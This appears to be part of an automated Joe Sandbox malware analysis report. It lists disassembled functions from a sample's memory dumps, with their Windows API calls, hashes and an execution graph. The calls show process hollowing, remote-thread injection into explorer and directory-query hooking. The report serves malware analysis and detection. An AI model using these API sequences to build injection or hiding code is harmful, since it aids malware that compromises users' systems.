                                                                                                                                                                                            • Part of subcall function 02F009D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02F00AA6
                                                                                                                                                                                            • Part of subcall function 02F009D9: ResumeThread.KERNEL32(?), ref: 02F00AB6
                                                                                                                                                                                            • Part of subcall function 02F009D9: Sleep.KERNEL32(000003E8), ref: 02F00AC6
                                                                                                                                                                                            • Part of subcall function 02F009D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02F00ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                                          • Opcode ID: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                                          • Instruction ID: dcd3a9327c4e4865b9b664304a324d077dac97abf37f275efd2f199f5cc6345f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                                          • Instruction Fuzzy Hash: E551A1316442549FEF226F60CCC5B9A77B8AF04784F0401D9BB49FE0D6DBB09690DB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F034B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02F034A2
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F034AD), ref: 02F034B1
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 02F034C2
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02F034CD
                                                                                                                                                                                            • Part of subcall function 02F0276C: VirtualAlloc.KERNEL32(00000000,03E80005,00003000,00000004,?,00000000), ref: 02F02787
                                                                                                                                                                                            • Part of subcall function 02F0276C: lstrcat.KERNEL32(00000000,02F027D1), ref: 02F027E0
                                                                                                                                                                                            • Part of subcall function 02F0276C: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,03E80005,00000004,?,00000000), ref: 02F02805
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 02F034E7
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02F034EE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtuallstrcat$Free$AllocCloseHandleNextProcess32lstrlen
                                                                                                                                                                                          • String ID: W
                                                                                                                                                                                          • API String ID: 1406046206-655174618
                                                                                                                                                                                          • Opcode ID: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                                          • Instruction ID: e28e044440cf7968e713f2b41323bed6f7bcb9deb3b66f1be5b2db58308b29e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F03175105510AEEB136F608CC8FBE3AA8AF41745F040099FE85FD099DB6441159A69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F009D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,02F009D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02F009E0
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02F00A08
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02F00A33
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02F05810,00000000,00000000,00000002), ref: 02F00A78
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02F00AA6
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02F00AB6
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02F00AC6
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02F00ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                                          • Instruction ID: 868f59966f274d87727562696791e7a8c80f8d2e166e7d36953146412101e73e
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE3150316402549FEF229F51CCC5BAA77B9FF04784F0801D8AA49FE0E5DBB09690DE64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F02535 Relevance: 7.6, APIs: 5, Instructions: 95stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(02F02525,00000010,?,?,02F029F8,00000104), ref: 02F0253A
                                                                                                                                                                                            • Part of subcall function 02F02572: lstrcat.KERNEL32(02F029F8,02F02553), ref: 02F0257A
                                                                                                                                                                                            • Part of subcall function 02F02572: lstrcat.KERNEL32(02F029F8,00000000), ref: 02F0258D
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(02F025BB,0000000B,?,00000000,02F02634,00000104), ref: 02F025CB
                                                                                                                                                                                          • lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2903145849-0
                                                                                                                                                                                          • Opcode ID: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                                          • Instruction ID: 2fa53948d3ee99fb269187e9e6a80ea0357af8f51f0779cf932a715a6c52c68d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB31DB711482819FDB039FA0CCAA9ED7B68FF42344B0840AAEE85DE0A3D6744557DFB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F031C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02F031EA
                                                                                                                                                                                            • Part of subcall function 02F026F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 02F02715
                                                                                                                                                                                            • Part of subcall function 02F026F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 02F02732
                                                                                                                                                                                            • Part of subcall function 02F026F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 02F0274E
                                                                                                                                                                                            • Part of subcall function 02F026F9: CloseHandle.KERNEL32(?), ref: 02F0275F
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 02F03228
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,02F031B5,00000011,?,00000000,00000000), ref: 02F03255
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,02F031B5,00000011,?,00000000,00000000,00000000,02F0306E,00000004,00000000), ref: 02F03261
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,02F031B5,00000011,?,00000000,00000000,00000000,02F0306E,00000004,00000000), ref: 02F0326D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandle$Createlstrcat$InfoPointerProcessStartupWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1477093598-0
                                                                                                                                                                                          • Opcode ID: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                                          • Instruction ID: 3b2aa8d050f53153ff6ac6c724ea38c1300bc23a2201db070bac4ae2400b18fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F1166729049189FDF126F60CC88FAFB7BDEF40345F0144A9EA85E6044DB305A80DFA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F0343F Relevance: 7.5, APIs: 5, Instructions: 43processmemorystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F0344D
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000000), ref: 02F03473
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 02F0348B
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02F034A2
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02F034EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocCloseCreateFirstHandleProcess32SnapshotToolhelp32Virtuallstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1167326197-0
                                                                                                                                                                                          • Opcode ID: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                                          • Instruction ID: 86ceee540d0b1a2f8b4cc0fffea335cc1019a1bccc84911e1fbc5bba0a0aaec7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE0126706412106FFB635A308CC9BAA36ECEF00795F0401E8FE44FE0D5DF7488158A69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F03F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02F03F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 02F03F2D
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02F03F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 02F03F4B
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02F03F5B
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02F03F6B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                                          • Instruction ID: 885f389de0fb3a83ad8f29d176fcc8b20af944eda94721dbe7e846062eec785a
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF01C74988240AAEF543BB08CCDA5936B9AF407C6F0405D1EB89BD0E4DE70A550AF75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F03EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(02F03EBD,00000006,E8FFFE1B,00000000), ref: 02F03EC8
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02F03F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 02F03F2D
                                                                                                                                                                                            • Part of subcall function 02F00C9C: GetProcAddress.KERNEL32(02F02811,02F0290A), ref: 02F00CA9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                          • String ID: j
                                                                                                                                                                                          • API String ID: 310444273-2747090070
                                                                                                                                                                                          • Opcode ID: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                                          • Instruction ID: 2931ce148716d4bd257f4e29155a6422e763f967167744f23e47729518b346d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F06875608250ADEF166AB08CC4FAA32BDAF407C6F0440D5EB85E90C4DE309544FFB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:8%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:2.6%
                                                                                                                                                                                          Total number of Nodes:193
                                                                                                                                                                                          Total number of Limit Nodes:20
                                                                                                                                                                                          execution_graph 4971 13808d9 4979 1380cc4 4971->4979 4973 13808e5 4982 1380643 4973->4982 4975 1380939 4990 138093e 4975->4990 4977 13808ef 4977->4975 4978 138091f SleepEx RtlExitUserThread 4977->4978 4978->4975 4997 1380c3f GetPEB 4979->4997 4981 1380cc9 4981->4973 4983 1380660 4982->4983 4999 138067c 4983->4999 4985 1380673 5005 13806c2 4985->5005 4987 13806b9 4988 138080f 4987->4988 5009 1380811 4987->5009 4988->4977 4991 1380cc4 GetPEB 4990->4991 4993 138094a 4991->4993 4992 1380af1 4992->4975 4993->4992 5029 13809d9 4993->5029 4995 13809d2 4995->4992 5033 1380af3 4995->5033 4998 1380c4b 4997->4998 4998->4981 4998->4998 5000 1380681 4999->5000 5001 13806c2 7 API calls 5000->5001 5003 13806b9 5001->5003 5002 138080f 5002->4985 5003->5002 5004 1380811 7 API calls 5003->5004 5004->5002 5007 13806c7 5005->5007 5006 138080f 5006->4987 5007->5006 5008 1380811 7 API calls 5007->5008 5008->5006 5010 1380840 5009->5010 5011 1380863 5010->5011 5014 1380866 5010->5014 5021 13808d9 5010->5021 5013 1380cc4 GetPEB 5011->5013 5011->5014 5015 13808e5 5013->5015 5014->4988 5016 1380643 5 API calls 5015->5016 5019 13808ef 5016->5019 5017 1380939 5018 138093e 5 API calls 5017->5018 5018->5017 5019->5017 5020 138091f SleepEx RtlExitUserThread 5019->5020 5020->5017 5022 1380cc4 GetPEB 5021->5022 5023 13808e5 5022->5023 5024 1380643 5 API calls 5023->5024 5027 13808ef 5024->5027 5025 1380939 5026 138093e 5 API calls 5025->5026 5026->5025 5027->5025 5028 138091f SleepEx RtlExitUserThread 5027->5028 5028->5025 5032 13809de 5029->5032 5030 1380af3 7 API calls 5031 1380af1 5030->5031 5031->4995 5032->5030 5032->5031 5035 1380b01 5033->5035 5036 1380cc4 GetPEB 5035->5036 5037 1380b0d 5036->5037 5042 1380b27 5037->5042 5039 1380b20 5041 1380b57 5039->5041 5046 1380b65 5039->5046 5043 1380b2c 5042->5043 5044 1380b65 7 API calls 5043->5044 5045 1380b57 5044->5045 5045->5039 5047 1380b6a 5046->5047 5052 13808b3 5047->5052 5055 13808b9 5052->5055 5053 13808d9 5 API calls 5054 13808d5 5053->5054 5056 1380cc4 GetPEB 5054->5056 5055->5053 5057 13808e5 5056->5057 5058 1380643 5 API calls 5057->5058 5061 13808ef 5058->5061 5059 1380939 5060 138093e 5 API calls 5059->5060 5060->5059 5061->5059 5062 138091f SleepEx RtlExitUserThread 5061->5062 5062->5059 5199 13a0b6b 5200 13a0b7d 5199->5200 5201 13a08b3 6 API calls 5200->5201 5202 13a0bb1 5201->5202 5203 13a0c3f GetPEB 5202->5203 5204 13a0bb6 5203->5204 5205 1380b6b 5209 1380b7d 5205->5209 5206 13808b3 7 API calls 5207 1380bb1 5206->5207 5208 1380c3f GetPEB 5207->5208 5210 1380bb6 5208->5210 5209->5206 5063 13a1f5e 5064 13a1f6c 5063->5064 5065 13a1f82 5063->5065 5067 13a1f8d VirtualAllocEx WriteProcessMemory CreateRemoteThread 5064->5067 5067->5065 5068 13a08b3 5069 13a08b9 5068->5069 5070 13a08d0 5068->5070 5082 13a1e62 5069->5082 5092 13a08d9 5070->5092 5083 13a1e73 5082->5083 5100 13a1d5a 5083->5100 5086 13a1d5a 3 API calls 5087 13a1eb9 5086->5087 5088 13a1d5a 3 API calls 5087->5088 5089 13a1ecc 5088->5089 5090 13a1d5a 3 API calls 5089->5090 5091 13a08c5 RtlExitUserThread 5090->5091 5091->5070 5108 13a0cc4 5092->5108 5094 13a08e5 5111 13a0643 5094->5111 5096 13a091f 5119 13a093e 5096->5119 5098 13a08ef 5098->5096 5099 13a1e62 3 API calls 5098->5099 5099->5096 5101 13a1d6e 5100->5101 5102 13a1e60 5100->5102 5101->5102 5103 13a1d80 VirtualProtect 5101->5103 5102->5086 5103->5102 5104 13a1dac 5103->5104 5105 13a1daf VirtualAlloc 5104->5105 5105->5105 5106 13a1de1 5105->5106 5107 13a1e09 VirtualProtect 5106->5107 5107->5102 5126 13a0c3f GetPEB 5108->5126 5110 13a0cc9 5110->5094 5112 13a0660 5111->5112 5128 13a067c 5112->5128 5114 13a0673 5134 13a06c2 5114->5134 5116 13a080f 5116->5098 5117 13a06b9 5117->5116 5138 13a0811 5117->5138 5120 13a0cc4 GetPEB 5119->5120 5122 13a094a 5120->5122 5121 13a0af1 5121->5096 5122->5121 5153 13a09d9 5122->5153 5124 13a09d2 5124->5121 5157 13a0af3 5124->5157 5127 13a0c4b 5126->5127 5127->5110 5127->5127 5129 13a0681 5128->5129 5130 13a06c2 6 API calls 5129->5130 5132 13a06b9 5130->5132 5131 13a080f 5131->5114 5132->5131 5133 13a0811 6 API calls 5132->5133 5133->5131 5136 13a06c7 5134->5136 5135 13a080f 5135->5117 5136->5135 5137 13a0811 6 API calls 5136->5137 5137->5135 5141 13a0840 5138->5141 5139 13a08d0 5143 13a08d9 5 API calls 5139->5143 5140 13a08c5 RtlExitUserThread 5140->5139 5141->5139 5141->5140 5142 13a0863 5141->5142 5144 13a0866 5141->5144 5146 13a1e62 3 API calls 5141->5146 5142->5144 5145 13a0cc4 GetPEB 5142->5145 5143->5142 5144->5116 5147 13a08e5 5145->5147 5146->5140 5148 13a0643 5 API calls 5147->5148 5151 13a08ef 5148->5151 5149 13a091f 5150 13a093e 5 API calls 5149->5150 5150->5149 5151->5149 5152 13a1e62 3 API calls 5151->5152 5152->5149 5156 13a09de 5153->5156 5154 13a0af3 6 API calls 5155 13a0af1 5154->5155 5155->5124 5156->5154 5156->5155 5159 13a0b01 5157->5159 5160 13a0cc4 GetPEB 5159->5160 5161 13a0b0d 5160->5161 5166 13a0b27 5161->5166 5163 13a0b20 5165 13a0b57 5163->5165 5170 13a0b65 5163->5170 5167 13a0b2c 5166->5167 5168 13a0b65 6 API calls 5167->5168 5169 13a0b57 5168->5169 5169->5163 5171 13a0b6a 5170->5171 5176 13a08b3 5171->5176 5177 13a08b9 5176->5177 5178 13a08d0 5176->5178 5181 13a1e62 3 API calls 5177->5181 5179 13a08d9 5 API calls 5178->5179 5180 13a08d5 5179->5180 5183 13a0cc4 GetPEB 5180->5183 5182 13a08c5 RtlExitUserThread 5181->5182 5182->5178 5184 13a08e5 5183->5184 5185 13a0643 5 API calls 5184->5185 5186 13a08ef 5185->5186 5188 13a1e62 3 API calls 5186->5188 5189 13a091f 5186->5189 5187 13a093e 5 API calls 5187->5189 5188->5189 5189->5187 5195 13a2270 5196 13a228b NtQueryDirectoryFile 5195->5196 5197 13a2394 5196->5197 5198 13a22f7 5196->5198 5198->5196 5198->5197 5190 13a1ee1 NtCreateUserProcess 5191 13a2334 5193 13a22f7 5191->5193 5192 13a2394 5193->5192 5194 13a228b NtQueryDirectoryFile 5193->5194 5194->5192 5194->5193

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 013A1F8D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80injectionmemorythreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE ref: 013A1FDE
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 013A2000
                                                                                                                                                                                          • CreateRemoteThread.KERNEL32 ref: 013A2028
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 1718980022-2766056989
                                                                                                                                                                                          • Opcode ID: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                                          • Instruction ID: 5dfa931b168189c6da55d443e70d6d7ed06949fb25be811420ce0b21a591a078
                                                                                                                                                                                          • Opcode Fuzzy Hash: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF118F3120C9084FE748EA1CE80D76577DAF7D8325F25436EE44ED3295DE3899168785
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 013A2270 Relevance: 1.6, APIs: 1, Instructions: 132filenativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 53 13a2270-13a2288 54 13a228b-13a22f1 NtQueryDirectoryFile 53->54 55 13a22f7-13a22fc 54->55 56 13a2394-13a2398 54->56 55->56 57 13a2302-13a2309 55->57 57->56 58 13a230f-13a231b call 13a2196 57->58 61 13a231d-13a2320 58->61 62 13a2322-13a2326 58->62 65 13a2385-13a238a 61->65 63 13a2328-13a232d 62->63 64 13a2372-13a2375 62->64 66 13a232f 63->66 67 13a2336-13a2339 63->67 68 13a237f-13a2383 64->68 69 13a2377-13a237d 64->69 65->56 70 13a238c-13a238f 65->70 66->54 71 13a233b-13a2345 67->71 72 13a2347-13a2355 67->72 68->65 69->65 70->58 71->56 71->72 73 13a2363 72->73 74 13a2357-13a2361 72->74 75 13a2365-13a2370 73->75 74->75 75->65
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtQueryDirectoryFile.NTDLL ref: 013A22E1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryFileQuery
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3295332484-0
                                                                                                                                                                                          • Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                                          • Instruction ID: e0790b7cde930f9071a54467fb040e6366f2397dce5016f84bcb1becc2eb7ebb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A412E70518A4E8FDF95EF5CC894B6A7BE4FB6E359F80016AE909C7290D734D484CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 013A1EE1 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 118 13a1ee1-13a1f5d NtCreateUserProcess
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateProcessUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2217836671-0
                                                                                                                                                                                          • Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                                          • Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 013A1D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
